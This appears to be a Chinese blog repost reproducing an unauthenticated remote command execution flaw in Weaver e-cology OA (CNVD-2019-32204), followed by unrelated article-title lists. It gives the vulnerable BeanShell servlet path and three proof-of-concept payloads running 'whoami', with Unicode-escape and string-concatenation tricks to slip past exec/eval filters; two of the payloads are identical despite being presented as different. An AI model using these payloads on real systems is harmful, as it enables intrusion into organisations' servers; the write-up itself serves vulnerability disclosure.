参考

https://blog.csdn.net/qq_41770175/article/details/102821349

https://www.linktrust.net/oday/471.html

https://www.freebuf.com/vuls/215218.html

漏洞描述

泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行

CNVD编号

CNVD-2019-32204

影响版本

e-cology <=9.0

漏洞修复

屏蔽/weaver/*目录的访问

漏洞复现

1.漏洞路径:/weaver/bsh.servlet.BshServlet

2.

把print(“hello!”)换成exec(“whoami”),就可以测试能否执行系统命令了。

Poc1:bsh.script=\u0065\u0078\u0065\u0063(“whoami”);&bsh.servlet.output=raw

如果有全局过滤器过滤了exec或eval,会有报错,

可以采用unicode编码、字符串拼接等方式绕过,见下图:

Poc2: bsh.script=\u0065\u0078\u0065\u0063(“whoami”);&bsh.servlet.output=raw

-----------------------------

Poc3:

bsh.script=eval%00(“ex”%2b”ec(bsh.httpServletRequest.getParameter(\”command\”))”);&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

最新文章

  1. eclipse svn分支与合并操作
  2. Java 串口通信
  3. Cocoapods的安装
  4. Spring中的JDBCTemplate
  5. 获取指定版本号svn
  6. 利用Hadoop实现超大矩阵相乘之我见(二)
  7. CSS基础要点概况
  8. C++函数传值调用
  9. Error 56: The Cisco Systems, Inc. VPN Service has not been started(Cisco VPN在Vista下出现Error 56的解决办法)
  10. php操作xml并插入到数据库中
  11. Android View框架总结(四)View布局流程之Measure
  12. 2、Storm中的一些概念理解
  13. OneNote无法打开链接出现错误:你的组织策略阻止我们为你完成此操作
  14. 详解angular2组件中的变化检测机制(对比angular1的脏检测)
  15. vue-02-安装-指令
  16. delphi 获取webbrowser的cookies给Idhttp用
  17. 2019 wannafly winter camp day 3
  18. linux下如何解除被占用的端口号
  19. Building Apache Thrift on CentOS 6.5
  20. Java之集合(一)接口及抽象类

热门文章

  1. SpringSecurity简单使用
  2. SpringBoot 中使用 Swagger2 出现 whitelabel page error 解决方法
  3. l2-002 链表去重 (未解决)
  4. 基于用户的协同过滤的电影推荐算法(tensorflow)
  5. React vs Vue in 2020
  6. gitpod &amp; free online ide
  7. js &amp; bitwise operator
  8. js &amp; for &amp; for of &amp; for in &amp; forEach, break
  9. git merge all in one
  10. k8s部署mysql数据持久化